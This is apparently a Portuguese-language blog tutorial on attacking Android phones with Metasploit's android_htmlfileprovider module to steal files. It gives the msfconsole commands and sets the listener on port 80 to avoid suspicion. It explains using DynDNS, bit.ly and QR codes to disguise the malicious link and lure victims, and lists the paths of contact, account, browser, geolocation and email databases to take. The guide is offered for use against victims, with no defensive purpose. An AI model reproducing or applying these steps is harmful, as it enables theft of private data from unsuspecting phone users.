publicidade
publicidade
publicidade
publicidade
publicidade
publicidade
publicidade

Hackeando e Obtendo Informacoes em Disposotivos com Android


Nesse arrigo estaremos abordando uma técnica de "hackear" os dispositivos moveis
hackear o androif
com o sistema operacional Android. Vamos utilizar a ferramente já conhecida por alguns, o Metasploit com um auxiliar de sua biblioteca  que pode ser encontrada no Sistema operacional BackTrack. Isso pode ser possível quando um dispositivo esta conectado em sua rede local, Mas usaremos  o DynDNS que nos da um alcance melhor do ataque, e veremos como ofuscar o endereço através de codigos QR e site que encurtam links como o bit.ly .

Vamos começar!

Roubar arquivos android_htmlfileprovider

A primeira coisa é começar o msfconsole no terminal do backtrack


  1. root@bt:~# /opt/framework3/msf3/msfconsole
Agora vamos usar um dos módulos auxiliares do Metasploit, que serve exatamente para  o nosso objetivo:
  1. msf > use gather/android_htmlfileprovider
  2. msf auxiliary(android_htmlfileprovider) >
Agora, vamos ver as opções que oferece o módulo...
  1. msf auxiliary(android_htmlfileprovider) > show options
  • FILES (arquivos do Android que queremos roubar) 
  • SRVHOST (IP local que estará a espera de conexões)
  • SRVPORT (A porta que estará a espera de conexões)
  • SSL (ALTERNATIVA - Se queremos usar SSL para negociação da conexão)
  • SSLVersion (Se tiver ativado a opção acima, indique a versão do  SSL )
  • URIPATH (A URI que será utilizada)
No momento , não vamos tocar na opção FILES. Já na opção SRVPORT mudará para 80, uma vez que é a porta http normal, e será mais suspeito se conectar-se a uma outra porta. Além disso URIPATH também vai mudar, que por padrão é uma seqüência aleatória, a vítima será direcionado para a raiz do servidor, faça com a baixo:

  1. msf auxiliary(android_htmlfileprovider) > set SRVPORT 80
  2. SRVPORT => 80
  3. msf auxiliary(android_htmlfileprovider) > set URIPATH /
  4. URIPATH => /
Agora só podemos começar a façanha usando o comando run, e esperar algum dispositivo conectar ao nosso IP ouvinte.

Veja a Imagem abaixo:

Exploit Executado 
Usando DynDNS para aumentar o alcance

Como dizemos, se fizermos esse ataque só para redes locais (LAN), como smartphones não costumam passar muito tempo conectado a uma rede Wi-Fi que estamos interessados. Mas é possível aumentar essa exploração, para fazer isso, neste caso vamos usar o DynDNS, que é um serviço que fornece o endereçamento dinâmico de domínio tipo site.dyndns *. Org .

Temos que ir no site da  http://dyn.com/ e criar uma conta. Após isso, pode registrar o domínio que escolhemos. Após este iria para as configurações do roteador e indicar o domínio, o nome de usuário e senha, como você pode ver (em outros roteadores pode ser diferente).


Devo dizer que DynDNS é um serviço excelente. Depois de configurar o domínio DynDNS só precisa redirecionar corretamente no ip do roteador. Ou seja, no nosso caso, a vítima irá se conectar ao vidasconcurrentes.dyndns.org (na porta 80) e deve ser definida para ir para a porta IP em que ouvimos o exploit.


Ofuscando o ataque com códigos QR e bit.ly

Temos tudo para o ataque,  teria que passar a url para as vítimas e esperar por ele para se conectar. O problema é que um estilo vidasconcurrentes.dyndns.org url pode ser bastante suspeito. Neste caso, use um encurtador de URL, usaremos o  bit.ly  ( pode se encontrar vários). 

Finalmente, se quisermos um ataque mais viral, podemos criar um código QR (http://qrcode.kaywa.com/) usando o link  que o encurtador de link do  bit.ly nos deu  , sendo ainda mais difícil de detectar.
O QR vai estar camuflado com o link do Bit, veja o EX :  http://bit.ly/q9wRCW , que redireciona para o domínio criado no DynDNS, o vidasconcurrentes.dyndns.org, que estará com o exploit a escuta.. Veja o Exemplo do QR.



Tendo sucesso em sua invasão, basta usar a criatividade para explorar, alguns diretorios do android em especial estará listados a baixo:

Banco de Dados de Contatos

/data/data/com.android.providers.contacts/databases/contacts.db

Banco de Dados do Browser
/data/data/com.android.browser/databases/browser.db

Banco de Dados de Contas
/data/data/com.google.android.googleapps/databases/accounts.db

Banco de Dados de Geolocalização
/data/data/com.android.browser/gears/geolocation.db

Diretório de Banco de Dados do Telefone
/data/data/com.android.providers.telephony/databases/

Banco de Dados de historicos
/data/data/com.google.android.apps.maps/databases/search_history.db

Diretório de Banco de Dados de E-Mail
/data/data/com.google.android.providers.gmail/databases/


A maioria dos aplicativos tem um diretório de bancos de dados, pode-se obter o suficiente de  informação.
Deixe seu Comentário:
Sem comentários »

0 comentários:

Postar um comentário

ORA VIVA, OLHA TEU COMENTARIO VALE MAIS DO QUE OURO PARA MIM, PRECISO DELE PARA MELHORAR A DISPONIBILIDADE DO BLOG.